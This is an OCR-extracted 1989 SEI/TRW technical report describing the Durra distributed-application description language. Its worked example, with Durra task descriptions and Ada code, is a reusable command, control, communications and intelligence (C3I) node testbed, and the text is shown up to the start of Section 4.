[25590, 28886, null], [28886, 32250, null], [32250, 35700, null], [35700, 38816, null], [38816, 42012, null], [42012, 45325, null], [45325, 48718, null], [48718, 51871, null], [51871, 54766, null], [54766, 57083, null], [57083, 60347, null], [60347, 63498, null], [63498, 66521, null], [66521, 69732, null], [69732, 72919, null], [72919, 76540, null], [76540, 77766, null], [77766, 77904, null], [77904, 77904, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 77904, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 77904, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 77904, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 77904, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 77904, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 77904, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 77904, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 77904, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 77904, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 77904, null]], "pdf_page_numbers": [[0, 0, 1], [0, 2550, 2], [2550, 6102, 3], [6102, 9387, 4], [9387, 11508, 5], [11508, 14220, 6], [14220, 17070, 7], [17070, 19090, 8], [19090, 22414, 9], [22414, 25590, 10], [25590, 28886, 11], [28886, 32250, 12], [32250, 35700, 13], [35700, 38816, 14], [38816, 42012, 15], [42012, 45325, 16], [45325, 48718, 17], [48718, 51871, 18], [51871, 54766, 19], [54766, 57083, 20], [57083, 60347, 21], [60347, 63498, 22], [63498, 66521, 23], [66521, 69732, 24], [69732, 72919, 25], [72919, 76540, 26], [76540, 77766, 27], [77766, 77904, 28], [77904, 77904, 29]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 77904, 0.17082]]}
|
olmocr_science_pdfs
|
2024-12-10
|
2024-12-10
|
fa5cd26110c836c2c675c8b1e83fdf35f8e9fd86
|
Command, Control, Communications, and Intelligence Node: A Durra Application Example
Mario R. Barbacci
Dennis L. Doubleday
Charles B. Weinstock
Steven L. Baur
David C. Bixler
Michael T. Heins
February 1989
Command, Control, Communications, and Intelligence Node: A Durra Application Example
Mario R. Barbacci
Dennis L. Doubleday
Charles B. Weinstock
Software for Heterogeneous Machines Project
Software Engineering Institute
Steven L. Baur
David C. Bixler
Michael T. Heins
Reusable C^3I Node Project
TRW Defense Systems Group
Approved for public release.
Distribution unlimited.
**Table of Contents**
1. Introduction to Durra
1.1. Type Declarations
1.2. Task Descriptions
1.3. Scenario
1.4. Runtime Components
1.4.1. The Scheduler
1.4.2. The Server
1.4.3. Application Tasks
2. Introduction to the TRW C^3I Testbed
2.1. C^3I Node Hardware Architecture
2.2. C^3I Node Software Architecture
3. Task and Application Descriptions
3.1. A Simple Task Description and Its Implementation
3.2. A Compound Task Description and Its Structure
3.3. An Application Description
4. Software Development Methodologies
4.1. Durra as a Tool for Successive Refinement
4.2. Incremental Development of the C^3I Node
5. Conclusions and Future Developments
5.1. Basic Demonstration
5.2. Study of Advanced Networking Issues
5.3. Advanced Demonstration
References
Appendix A. C^3I Node Application Description
Appendix B. Application Message Handler Description
B.1. Subsystem Description
B.2. Component Task Descriptions
B.2.1. Control Task
B.2.2. Inbound Message Task
B.2.3. Outbound Message Task
Appendix C. Communications
C.1. Subsystem Description
C.2. Component Task Descriptions
C.2.1. Control Task
<table>
<thead>
<tr>
<th>Section</th>
<th>Page</th>
</tr>
</thead>
<tbody>
<tr>
<td>C.2.2. Inbound Message Task</td>
<td>48</td>
</tr>
<tr>
<td>C.2.3. Outbound Message Task</td>
<td>48</td>
</tr>
<tr>
<td>Appendix D. System Manager Description</td>
<td>49</td>
</tr>
<tr>
<td>Appendix E. Workstation Description</td>
<td>51</td>
</tr>
<tr>
<td>E.1. Subsystem Description</td>
<td>51</td>
</tr>
<tr>
<td>E.2. Component Task Descriptions</td>
<td>51</td>
</tr>
<tr>
<td>E.2.1. Manager Task</td>
<td>51</td>
</tr>
<tr>
<td>Appendix F. Type Declarations</td>
<td>53</td>
</tr>
<tr>
<td>Appendix G. Scheduler Interface for Ada Task Implementations</td>
<td>55</td>
</tr>
</tbody>
</table>
## List of Figures
| Figure 1-1: | Compilation of an Application Description | 2 |
| Figure 1-2: | Durra Type Declarations | 2 |
| Figure 1-3: | A Template for Task Descriptions | 3 |
| Figure 1-4: | Compound Task Description | 4 |
| Figure 1-5: | Scenario for Developing an Application in Durra | 6 |
| Figure 1-6: | The Durra Runtime Environment | 7 |
| Figure 2-1: | C<sup>3</sup>I System Structure — Army Tactical System | 13 |
| Figure 2-2: | Reusable C<sup>3</sup>I Node Architecture Layers | 14 |
| Figure 2-3: | Data Flow Among Nodal Software Components | 15 |
| Figure 3-1: | AMHS_Control Task Description | 19 |
| Figure 3-2: | AMHS_Control Task Implementation | 21 |
| Figure 3-3: | Sample Sequence of Port Operations | 22 |
| Figure 3-4: | AMHS Subsystem Description | 23 |
| Figure 3-5: | C<sup>3</sup>I Node Description | 25 |
| Figure 3-6: | C<sup>3</sup>I Node Structure | 26 |
| Figure 4-1: | Initial Application Description | 29 |
| Figure 4-2: | Initial Task Descriptions | 31 |
| Figure 4-3: | Final Structure of the C<sup>3</sup>I Node | 32 |
| Figure 4-4: | Incremental Development of the C<sup>3</sup>I Node — Sequence 1 | 33 |
| Figure 4-5: | Incremental Development of the C<sup>3</sup>I Node — Sequence 2 | 34 |
| Figure 4-6: | Incremental Development of the C<sup>3</sup>I Node — Sequence 3 | 35 |
Command, Control, Communications, and Intelligence Node: A Durra Application Example
Abstract: Durra is a language designed to support the construction of distributed applications using concurrent, coarse-grain tasks running on networks of heterogeneous processors. An application written in Durra describes the tasks to be instantiated and executed as concurrent processes, the types of data to be exchanged by the processes, and the intermediate queues required to store the data as they move from producer to consumer processes.
This report describes an experiment in implementing a command, control, communications and intelligence (C³I) node using reusable components. The experiment involves writing task descriptions and type declarations for a subset of the TRW testbed, a collection of C³I software modules developed by TRW Defense Systems Group. The experiment illustrates the development of a typical Durra application. This is a three-step process: first, a collection of tasks (programs) is designed and implemented (these are the testbed programs); second, a collection of task descriptions corresponding to the task implementations is written in Durra, compiled, and stored in a library; and finally, an application description is written in Durra and compiled, resulting in a set of resource allocation and scheduling commands to be interpreted at runtime.
This report illustrates the methodology for building complex, distributed systems supported by Durra. It does not, however, illustrate all the features of the language; in particular, it does not illustrate those features that support dynamic, but planned, reconfiguration of a running application, or those features supporting unplanned dynamic reconfigurations as a means to support fault tolerance. These considerations are the subject of current design and development and will be the subject of a future report.
1. Introduction to Durra
Durra [1, 2] is a language designed to support the construction of distributed applications using concurrent, coarse-grained tasks running on networks of heterogeneous processors. An application written in Durra selects and reuses task descriptions and type declarations stored in a library. The application describes the tasks to be instantiated and executed as concurrent processes, the types of data to be exchanged by the processes, and the intermediate queues required to store the data as they move from producer to consumer processes.
Because tasks are the primary building blocks, we refer to Durra as a task-level description language. We use the term "description language" rather than "programming language" to emphasize that a Durra application is not translated into object code in some kind of executable (conventional) "machine language." Instead, a Durra application is a description of the structure and behavior of a logical machine to be synthesized into resource allocation and scheduling directives that are then interpreted by a combination of software, firmware,
and hardware in each of the processors and buffers of a heterogeneous machine. This is
the translation process depicted in Figure 1-1.
1.1. Type Declarations
The data types transmitted between the tasks are declared independently of the tasks. In
Durra, these data type declarations specify scalars (of possible variable length), arrays,
simple record types, or unions of other types, as shown in Figure 1-2.
```haskell
-- Packets are of variable length.
type packet is size 128 to 1024;
type tails is array (5 10) of packet;
-- Tails are 5 by 10 arrays of packets.
type rec is record (rows: integer, columns: integer, data: packet);
-- Rec data consists of two integers and a packet.
type mix is union (heads, tails);
-- Mix data could be heads or tails.
```
**Figure 1-2:** Durra Type Declarations
1.2. Task Descriptions
Task descriptions are the building blocks for applications. A task description includes the following information (Figure 1-3): (1) its interface to other tasks (ports); (2) its attributes; (3) its functional and timing behavior; and (4) its internal structure, thereby allowing for hierarchical task descriptions.
```
task task-name
ports
port-declarations
attributes
attribute-value-pairs
behavior
functional specification
timing specification
structure
process-declarations
bind-declarations
queue-declarations
reconfiguration-statements
end task-name
```
Figure 1-3: A Template for Task Descriptions
The interface information declares the ports of the processes instantiated from the task. A port declaration specifies the direction and type of data moving through the port. An In port takes input data from a queue; an out port deposits data into a queue:
```
ports
in1: in heads;
out1, out2: out tails;
```
The attribute information specifies miscellaneous properties of a task. Attributes are a means of indicating pragmas or hints to the compiler and/or scheduler. In a task description, the developer of the task lists the actual value of a property; in a task selection, the user of a task lists the desired value of the property. Example attributes include author, version number, programming language, file name, and processor type:
```
attributes
author = "jmw";
implementation = "program_name";
Queue_Size = 25;
```
The behavioral information specifies functional and timing properties about the task. The functional information part of a task description consists of a pre-condition on what is required to be true of the data coming through the input ports, and a post-condition on what is guaranteed to be true of the data going out through the output ports. The timing expression describes the behavior of the task in terms of the operations it performs on its input and output ports.
output ports. For additional information about the syntax and semantics of the functional and timing behavior description, see the Durra reference manual [1].
The structural information defines a process-queue graph (e.g., Figure 1-1) and possible dynamic reconfiguration of the graph as shown in Figure 1-4.
```
task comm
-- red communications processing
ports
SM_Commands : in system_command;
SM_Responses : out subsystem_response;
Inbound : out comm_if_message;
Outbound : in comm_if_message;
structure
process
cc : task comm_control;
ci : task comm_inbound;
co : task comm_outbound;
pb : task broadcast
port
in1 : in system_command;
out1, out2 : out system_command;
end broadcast;
pm : task merge
port
in1, in2 : in subsystem_response;
out1 : out subsystem_response;
attribute
mode = fifo;
end merge;
bind
SM_Commands = cc.SM_In;
SM_Responses = cc.SM_Out;
Inbound = ci.Inbound;
Outbound = co.Outbound;
queue
q1 : cc.Cmd_Out >> pb.in1;
q2 : pb.out1 >> ci.Cmd_In;
q3 : pb.out2 >> cc.Cmd_In;
q4 : ci.Resp_Out >> pm.in1;
q5 : cc.Resp_Out >> pm.in2;
q6 : pm.out1 >> cc.Resp_In;
q7 : cc.Echo_Out >> ci.Echo_In;
end comm;
```
Figure 1-4: Compound Task Description
A process declaration of the form
```
process_name : task task_selection
```
creates a process as an instance of the specified task. Since a given task (e.g., convolution) might have a number of different implementations that differ along different
dimensions such as algorithm used, code version, performance, or processor type, the task selection in a process declaration specifies the desirable features of a suitable implementation. The presence of task selections within task descriptions provides direct linguistic support for hierarchically structured tasks.
A queue declaration of the form
\[
\text{queue_name [queue_size]: port_name_1 > data_transformation > port_name_2}
\]
creates a queue through which data flow from an output port of a process (port_name_1) into the input port of another process (port_name_2). Data transformations are operations applied to data coming from a source port before they are delivered to a destination port.
A port binding of the form
\[
\text{task_port = process_port}
\]
maps a port on an internal process to a port defining the external interface of a compound task.
Although not illustrated in the figure, Durra provides a reconfiguration statement of the form
\[
\text{if condition then}
\begin{align*}
\text{remove & process-names} \\
\text{process & process-declarations} \\
\text{queues & queue-declarations}
\end{align*}
\text{end if;}
\]
as a directive to the scheduler. It is used to specify changes in the current structure of the application (i.e., process-queue graph) and the conditions under which these changes take effect. Typically, a number of existing processes and queues are replaced by new processes and queues, which are then connected to the remainder of the original graph. The reconfiguration predicate is a Boolean expression involving time values, queue sizes, and other information available to the scheduler at runtime.
1.3. Scenario
We see three distinct phases in the process of developing an application using Durra: the creation of a library of tasks, the creation of an application using library tasks, and the execution of the application. These three phases are illustrated in Figure 1-5.
During the first phase, the developer writes descriptions of the component tasks and declarations of the data types. The type declarations specify the kinds of data that will be produced and consumed by the tasks in the application. The task descriptions specify the properties of the task implementations (programs). For a given task, there may be many implementations, differing in programming language (e.g., C or assembly language), processor type (e.g., Motorola 68020 or IBM 1401), performance characteristics, or other attributes. For each implementation of a task, a description must be written in Durra, compiled, and entered in the library.
During the second phase, the user writes an *application description*. Syntactically, an application description is a single task description and could be stored in the library as a new task. This allows writing of hierarchical application descriptions. When the application description is compiled, the compiler generates a set of resource allocation and scheduling commands or instructions to be interpreted by the scheduler.
During the last phase, the scheduler loads the task implementations (i.e., programs corresponding to the component tasks) into the processors and issues the appropriate commands to execute the programs.
1.4. Runtime Components
There are three active components in the Durra runtime environment: the application tasks, the Durra server, and the Durra scheduler. Figure 1-6 shows the relationship among these components.

After compiling the type declarations, the component task descriptions, and the application description, as described previously and illustrated in figure 1-5, the application can be executed by performing the following operations:
1. The component task implementations must be stored in the appropriate processors.
2. An instance of the Durra server must be started in each processor.
3. The scheduler must be started in one of the processors. The scheduler receives as an argument the name of the file containing the scheduler pro-
gram generated by the compilation of the application description. This step initiates the execution of the application.
1.4.1. The Scheduler
The scheduler is the part of the Durra runtime system responsible for starting the tasks, establishing communication links, and monitoring the execution of the application. In addition, the scheduler implements the predefined tasks (broadcast, merge, and deal) and the data transformations described in [1]. The scheduler is invoked with the name of the file containing the scheduler instructions generated by the Durra compiler. A complete description of the scheduler instructions can be found in [3].
After these instructions have been read and processed, the scheduler is ready to start the execution of the application. In the current UNIX implementation, this is done by performing the following steps:
1. Allocate a UNIX socket for communication with the application tasks.
2. Establish communication with each of the processors running a Durra server.
3. For each of the task_load instructions, issue to the appropriate server a run_task remote procedure call.
4. Listen in on the UNIX socket allocated in the first step for remote procedure calls from the application tasks.
5. Process the remote procedure calls from the application tasks.
The scheduler waits until all tasks have completed their execution before it, in turn, finishes its execution.
1.4.2. The Server
The server is responsible for starting tasks on its corresponding processor, as directed by the scheduler. One copy of the server must be running on each processor that is to execute Durra tasks.
When a server begins execution, it listens in on a predetermined socket for messages from the scheduler. Once a communication channel is open, the scheduler communicates with the server using a set of remote procedure calls to initiate task execution (run_task), or to shutdown or restart the server (shutdown, and restart). Complete details of these remote procedure calls can be found in [3]. The server sits in a loop responding to the requests from the scheduler, executing them as directed.
1.4.3. Application Tasks
The component task implementations making up a Durra application can be written in any language for which a Durra interface has been provided. As of this writing, there are Durra interfaces for both C and Ada. The complete interfaces appear in [3].
When a task is started, the scheduler supplies it with the following information (via a server):
the name of the host on which the scheduler is executing, the UNIX socket on which the scheduler is listening for communications from the task, and a small integer to be used in identifying the task in future messages.
Application tasks use the interface to the scheduler to communicate with other tasks. From the point of view of the task implementation, this communication is accomplished via procedure calls, which return only when the operation is completed. The following remote procedure calls (RPCs) are provided:
- **init**: Opens a connection to the scheduler.
- **finish**: Informs the scheduler that the task is terminating.
- **get_portid**: Returns a descriptor for the application task to use when referring to a port.
- **get_typeld**: Returns a descriptor for the application task to use when referring to a type.
- **send_port**: Sends data through an output port of the application task.
- **get_port**: Gets data from an input port of the application task.
- **test_input_port**: Tests whether data is available on an input port.
- **test_output_port**: Tests whether there is room in a queue attached to an output port.
Duran tasks typically use these RPCs in the following order:
1. Call **init** to establish communication with the scheduler.
2. Call **get_portid** for each of the task ports (these ports must correspond to the ports used in the task description).
3. Call **get_typeld** for each of the task types (these types must correspond to the data types used in the task description).
4. Call **send_port** and **get_port** as necessary to send and receive data.
5. Call **finish** to break communication with the scheduler.
2. Introduction to the TRW C³I Testbed
The TRW command, control, communications, and intelligence (C³I) testbed is a collection of programs that implement a variety of functions found in command, control, communications, and intelligence systems. They have been developed as a part of the Reusable C³I Node Independent Research and Development Project at TRW Defense Systems Group. The overall objective of this project is to reduce the cost and schedule for fielding state-of-the-art, next generation C³I systems. TRW plans to achieve this objective by developing a standardized architectural framework for C³I systems and reusable hardware and software components that are applicable over a wide range of target systems. The technical objectives for the Reusable C³I Node Project are to 1) develop a reusable C³I system architecture, including hardware and software components; 2) develop software and, if necessary, hardware components as building blocks within the architecture; and 3) test the flexibility of the architecture and components by demonstrating them on several actual target C³I systems.
In the remainder of this chapter we will address only one of several tasks identified by TRW as critical to their overall objective, namely the development of an architecture framework in which various C³I system building blocks fit. This would be used to define the interfaces and the possible combinations of building blocks during the definition of the reusable system baseline, and to help during the integration and testing of the application system. Other major tasks, not addressed in this report, include software component definition and development, hardware component selection and integration, and testbed integration and demonstration.
2.1. C³I Node Hardware Architecture
The architecture adopted for the reusable C³I node and its testbed is open so that any vendor's equipment could be connected and the node software integrated with the vendor-supplied hardware and system software. To reach this goal of an open system architecture, it is necessary to have a paradigm for programming loosely-connected networks of multiple special- and general-purpose processors. This is the role played by the Durra language and methodology. The need for experimenting with paradigms for heterogeneous networks provided the motivation for a joint effort between TRW Defense Systems Group and the Software Engineering Institute.
C³I systems have similar requirements and functions whether the system is for tactical or strategic forces, whether it is fixed-base or mobile, or whether it is controlling planes, tanks, or ships. The purpose of all such systems is to give up-to-the-minute information to commanders at each echelon to assist them in making decisions and to speed implementation of these decisions. The top-level description of a typical tactical C³I system is shown in Figure 2-1. This system consists of a network of geographically separated nodes where each node is a local area network of processors. Communication among the nodes (located
at command posts) is via combat net radios or land lines and consists of messages whose format and protocol is tightly controlled by Army standards and doctrine. Each node contains a database representing the battle situation (deployment of friendly and enemy forces) and the status of forces controlled by this command post. The overall information flow for the system is predominantly hierarchical, with messages containing orders or requests for information flowing from upper echelons to lower echelons and messages containing status and situation reports flowing back to the upper echelons.
Each node consists of a network of computers whose purpose is to process operator requests for information, to act on incoming messages (by showing them to an operator or replying automatically), and to maintain the situation and status database. The computers at a node may be concentrated in a command post structure (shelter, tent, or parked vehicle) or dispersed among several structures for concealment. They typically communicate via Ethernet or fiber-optic equivalents. At this level the communications protocols are not restricted and may support exchange of message text, database information, keyboard/screen information, etc. At each node in the system common processing is done: communications equipment management, message processing, data management, management of the LAN, and interaction with the operators. In addition, a node may have unique application responsibilities such as resource allocation, planning, and decision making.
2.2. C³I Node Software Architecture
TRW has defined a nodal software architecture which supports both the common processing functions and site- or system-specific ones. As shown in Figure 2-2, the architecture is extensively layered to support the open architecture concepts described above. In addition to multiple vendors, the architecture supports redistribution of functions among processors to support networks containing from 1 to 50 processors. The reusable C³I node IR&D Project is building software components for the shaded functional areas in the diagram. These components are implemented as Ada tasks and packages. The tasks communicate via messages using services provided by the Heterogeneous InterProcess Communication (IPC) function; in the testbed, alternative IPC functions have been implemented, one with the Durra runtime environment and one with a TRW-developed IPC. Figure 2-3 shows the top-level data flow in a system constructed from the components.
The "communication processing" area is a support subsystem which performs all of the processing associated with sending and receiving messages to or from other nodes in the system. It typically consists of a collection of hardware and firmware interfaces to the communications media and software to coordinate the operation of the subsystem. The tasks, which are top-level components of the communication processing subsystem, include media service, inbound message processing, outbound message processing, data services (log, archive, etc.), and communication control.
The "automated message handling (amh)" area is a subsystem which performs all proc-
Figure 2-1: C³I System Structure — Army Tactical System
Figure 2-2: Reusable C^3I Node Architecture Layers
Figure 2-3: Data Flow Among Nodal Software Components
essing of the text of incoming and outgoing messages for a node. For incoming messages, it identifies the message type and verifies that it is correctly formatted, extracts data from the message to update the database, and disseminates the message to intended recipients at the workstations. Outgoing message processing consists of review and message release routing within the node. The tasks which are the top-level components of the "AMH" subsystem are inbound message processing, outbound message processing, and control.
The "system management" area performs all of the executive and control functions for the nodal network. This includes:
- system startup, shutdown, and reconfiguration
- user login, access verification, and logout
- error reporting and monitoring
- health and performance monitoring
The components of system management are the overall system manager task and a subsidiary workstation manager task at computers for each operator station. Computers which perform only background processing do not contain a workstation manager.
The "data management" area performs all database access and control functions for a node. In most systems this is a commercial relational database management system such as SYBASE, ORACLE, etc., but may be as simple as a flat-file record handling system which keeps the data in primary memory. The components of this subsystem are the DBMS servers and the distributed server and client control logic.
The "user/system interface (usi)" area manages all interaction with the operators at each workstation in the node. This is a complicated subsystem which contains window managers, main menu (or other user selection mechanism) managers, text and graphic, tool support libraries, and other software to support a multi-window, networked environment.
The "application support" area provides interface and scheduling services for application tasks and contains the common office automation applications like electronic mail, word processing, and spreadsheets. The scheduling services include message event scheduling, database event scheduling, and time scheduling of application tasks.
The definition of the architecture and the implementation of the software components for the C³I testbed coincide with the Durra paradigm in many ways:
- Utilizing libraries of reusable "black-box" tasks.
- Describing the connectivity of the system outside the code of the task.
- Using message-oriented communication between the tasks.
- Describing data transformations during the transmission of the messages.
The flexibility and control over system operation provided by this paradigm are central to the open architecture concept and the ability to reuse the developed software modules. In the
remainder of this report, we will illustrate the use of Durra to build applications consisting of C³I node software modules in which the various tasks connected through queues exchange messages.
3. Task and Application Descriptions
In this chapter we illustrate the various kinds of descriptions that would be written in a typical application of Durra. The examples depict increasingly more complex task descriptions. We first show a simple task description, of a task implemented by a single program and capable of running on one of the processors in a heterogeneous network. We then show a compound task description, that is, a task that consists of several simpler tasks whose ports are connected via data queues. Finally, we show an application description which, syntactically, looks like a compound task description and ties together all of the component tasks (simple or otherwise) of an application.
3.1. A Simple Task Description and Its Implementation
In this section we illustrate the relation between a Durra task description, a task implementation, and the interface between the task implementation and the Durra runtime environment. The task we have selected is the control module of the Automatic Message Handler in the C3I node.
As described in Section 2.2, the automated message handling subsystem of the C3I node performs all processing of the text of incoming and outgoing messages for a node. As we show in this and in later sections, this subsystem consists of several tasks. One of these tasks, "amhs_control," is responsible for the overall operation of the subsystem and performs its job by sending requests to the other components of the subsystem and processing their responses. In addition, it provides the interface to other subsystems of the C3I node, specifically, the system manager subsystem.
```
task amhs_control
ports
SM_In : in system_command;
SM_Out : out subsystem_response;
Cmd_Out : out system_command;
Resp_In : in subsystem_response;
attributes
implementation = "amhs_control";
x10window = "80x12+0+0";
x11window = "-geometry 80x12+0+0";
processor = sun;
end amhs_control;
```
Figure 3-1: AMHS_Control Task Description
Figure 3-1 shows the Durra description of the "amhs_control" task. The interface portion of the task description indicates that it consumes data of type "system_command" and "subsystem_response" through input ports "SM_In" and "Resp_In," and produces data of type "subsystem_response" and "system_command" through output ports "SM_Out" and "Cmd_Out," respectively.
The attributes of the task description provide additional information about the task. These include the name of the task implementation (i.e., “amh_control” is the actual executable program), the name of the processor or processor class on which this implementation can execute (“sun”), and the specifications of a window geometry to be used for communication between a human operator and the task. Notice that two alternative window specifications are provided, depending on which version of the window manager is running on the processor to which the task will be allocated at runtime.
As indicated in Figure 1-5, for each task description, there is a corresponding task implementation. The latter is a program that will be loaded, at runtime, on one of the machines on the network and will communicate with other task implementations through ports. The task description indicates that this is a program that can run on a Sun workstation and that it communicates with a human operator through a small window (12 lines of 80 characters). This window specification is necessary because this task runs as an independent, interactive program, with its own terminal emulator running in the window. The server [3] running on the Sun workstation uses the window specification as part of the UNIX task initiation command.
The task implementation in this example is an Ada program, as shown in figure 3-2. This program consists of a main unit, the procedure listed in the Figure (“AMH_Control”), and a separately compiled procedure (“AMH_Control_Processing”), not shown here. The main unit in this program is responsible for 1) establishing a connection with the Durra scheduler (call to “Init”), 2) getting a small integer token to identify each of its ports (calls to “Get_PortID”). 3) invoking the separate procedure, where the bulk of the application specific work is done, and, finally, 4) notifying the Durra scheduler when it has completed its execution (call to “Finish”).
Notice the correspondence between the port names used in the calls to “Get_PortID” in the task implementation of Figure 3-2 and the port names used in port declarations in the task description of Figure 3-1.
The separately compiled procedure (“AMH_Control_Implementation”) uses the port identifier tokens collected by the main procedure to invoke various input and output operations on these ports. This procedure is rather lengthy, and instead of including the entire text, we illustrate these port operations via a small segment of “AMH_Control_Processing”, the procedure (“Read_Next_Message”) shown in Figure 3-3. The small procedure loops continuously, testing for the presence of messages on the input ports (calls to “Test_Input_Port”). If there is at least one message on either of the ports, the procedure reads the message into a buffer (calls to “Get_Port”) and returns to the caller.
There are a few more interface procedures to support the communication between the user task implementations and the Durra scheduler. However, for the purposes of this report, it is not necessary to go into further details. The complete interface to the scheduler is described in [3]. Appendix G contains the specifications of the interface package for Ada programs.
procedure AMH_Control is
pragma Priority(4);
Process_ID : Integer := 1001;
size : Integer;
bound : Integer;
Verbose : constant Boolean := True;
SM_In_Port : Positive;
SM_Out_Port : Positive;
Cmd_Out_Port : Positive;
Resp_In_Port : Positive;
procedure AMH_Control_Processing( Process_ID : in Integer)
is separate;
begin
Put_Line( "***** amh_control ***** " );
Interface.Init;
Interface.Get_PortID("SM_In", SM_In_Port, bound, size);
Interface.Get_PortID("SM_Out", SM_Out_Port, bound, size);
Interface.Get_PortID("Cmd_Out", Cmd_Out_Port, bound, size);
Interface.Get_PortID("Resp_In", Resp_In_Port, bound, size);
AMH_Control_Processing (Process_ID);
Interface.Finish;
return;
end AMH_Control;
Figure 3-2: AMHS Control Task Implementation
3.2. A Compound Task Description and Its Structure
The Durra language supports hierarchical task descriptions. The previous section illustrated a simple task description and its implementation. The task used in that example is one of several components of the Automated Message Handling System (AMHS). In this section we will use this and other similar, simple tasks to describe the complete message handler shown in figure 3-4.
The "AMHS" subsystem consists of five tasks. Three of these tasks, "AMHS_control," "AMHS_inbound," "AMHS_outbound," are user-implemented ("AMHS_control" was shown in the previous section, the other two appear in Appendix B). The other two tasks, "broadcast" and "merge" are predefined in the Durra language and implemented directly by the Durra runtime system. A "broadcast" task takes data from a single input port and copies it to multiple output ports (the number of output ports is specified in the task selection). A "merge" task takes data from multiple input ports (specified in the task selection) and copies them into a single output port.
procedure Read_Next_Message(Msg_Type: in out Message_Type) is
Read_Cycle_Delay : Duration := 0.5;
Durra_type, size, n : natural;
begin
Read_Loop:
loop
Interface.Test_Input_Port( SM_In_Port,
Durra_type,
size,
n);
if n > 0 then
Interface.Get_Port( SM_In_Port,
Cmd_Msg'Address,
size,
Msg_Type);
exit Read_Loop;
end if;
Interface.Test_Input_Port( Resp_In_Port,
Durra_type,
size,
n);
if n > 0 then
Interface.Get_Port( Resp_In Port,
Resp_Msg'Address,
size,
Msg_Type);
exit Read_Loop;
end if;
delay Read_Cycle_Delay;
end loop Read_Loop;
return;
end Read_Next_Message;
Figure 3-3: Sample Sequence of Port Operations
The application description instantiates five processes ("ac," "ai," "ao," "pb," and "pm"), corresponding to the five tasks mentioned above and six queues ("q1" through "q6") that connect the processes’ ports. Notice that not all the internal-task ports are connected. This group of tasks implements a subsystem which can be used as a building block for a larger system (the C³ node, in this case,) and therefore must also have ports to communicate with other subsystems. Since the subsystem is really an abstraction and does not really correspond to a executable program, its ports ("SM_Commands," "SM_Response," "COMM_Inbound," "COMM_Outbound," "WS_Inbound," and "WS_Outbound") must be implemented by internal-task ports. This is the purpose of the bind declarations, which declare the internal-task ports that implement or correspond to the subsystem ports.
task AMHS
-- Automated Message Handling Subsystem
ports
SM_Commands : in system_command;
SM_Responses : out subsystem_response;
COMM_Inbound : in comm_if_message;
COMM_Outbound : out comm_if_message;
WS_Inbound : out workstation_if_message;
WS_Outbound : in comm_if_message;
structure
process
ac : task AMHS_control;
ai : task AMHS_inbound;
ao : task AMHS_outbound;
pb : task broadcast
port
in1 : in system_command;
out1, out2 : out system_command;
end broadcast;
pm : task merge
port
in1, in2 : in subsystem_response;
out1 : out subsystem_response;
attribute
mode = fifo;
end merge;
bind
SM_Commands = ac.SM_In;
SM_Responses = ac.SM_Out;
COMM_Inbound = ai.COMM_Inbound;
COMM_Outbound = ao.COMM_Outbound;
WS_Inbound = ai.WS_Inbound;
WS_Outbound = ao.WS_Outbound;
queue
q1 : ac.Cmd_Out >> pb.in1;
q2 : pb.out1 >> ai.Cmd_In;
q3 : pb.out2 >> ao.Cmd_In;
q4 : ai.Resp_Out >> pm.in1;
q5 : ao.Resp_Out >> pm.in2;
q6 : pm.out1 >> ac.Resp_In;
end AMHS;
Figure 3-4: AMHS Subsystem Description
3.3. An Application Description
In this section we illustrate a complete application description. There are no special language features beyond those used to describe a compound task. An application description is simply a compound task description which is compiled and stored in a Durra library and, conceivably, could be used as a building block for a larger application.
From the point of view of the users of Durra, the main difference between a task description and an application description is that application descriptions are translated into directives to the runtime scheduler by executing an optional code generation phase of the Durra compiler, as described in [3].
Continuing with the examples of the previous sections, let's assume that the C$^3$I node constitutes the complete application (i.e., we are ignoring the rest of the network -- it would consist of multiple instances of nodes and communication tasks). In addition to the Automated Message Handling System, there are several other components of the C$^3$I node, as illustrated in figure 3-5.
The C$^3$I node consists of five main subsystems ("system_manager," "comm," "amhs," and two instances of "wkstn"). In addition, there are four predefined tasks (two broadcast and two merge) that serve to multiplex and demultiplex messages exchanged between the main subsystems, as shown in Figure 3-6.
The complete set of task descriptions and type declarations used to build the application are included in the appendices.
task configuration
structure
process
-- real system processes
sm : task system_manager;
com : task comm;
amh : task amhs;
wlp : task wkstn;
w2p : task wkstn;
-- auxiliary system processes
dmxp: task broadcast -- message demultiplexor
ports
in1 : in workstation_if_message;
out1, out2 : out workstation_if_message;
end broadcast;
muxp: task merge -- message multiplexor
ports
out1 : out comm_if_message;
in1, in2 : in comm_if_message;
attribute
mode = fifo;
end merge;
bc : task broadcast -- command broadcast
ports
in1 : in system_command;
out1, out2 : out system_command;
end broadcast;
mg : task merge -- response multiplexor
ports
in1, in2 : in subsystem_response;
out1 : out subsystem_response;
attribute
mode = fifo;
end merge;
queues
-- system command propagation
q_c1 : sm.SM_Out >> bc.in1;
q_c2 : bc.out1 >> com.SM_Commands;
q_c3 : bc.out2 >> amh.SM_Commands;
-- subsystem response propagation
q_r1 : com.SM_Responses >> mg.in1;
q_r2 : amh.SM_Responses >> mg.in2;
q_r3 : mg.out1 >> sm.SM_In;
-- inbound message propagation
q_i1 : com.Inbound >> amh.COMM_Inbound;
q_i2 : amh.WS_Inbound >> dmxp.in1;
q_i3 : dmxp.out1 >> wlp.Inbound;
q_i4 : dmxp.out2 >> w2p.Inbound;
-- outbound message propagation
q_o1 : wlp.Outbound >> muxp.in1;
q_o2 : w2p.Outbound >> muxp.in2;
q_o3 : muxp.out1 >> amh.WS_Outbound;
q_o4 : amh.COMM_Outbound >> com.Outbound;
end configuration;
Figure 3-5: C3I Node Description
Figure 3-6: C³I Node Structure
4. Software Development Methodologies
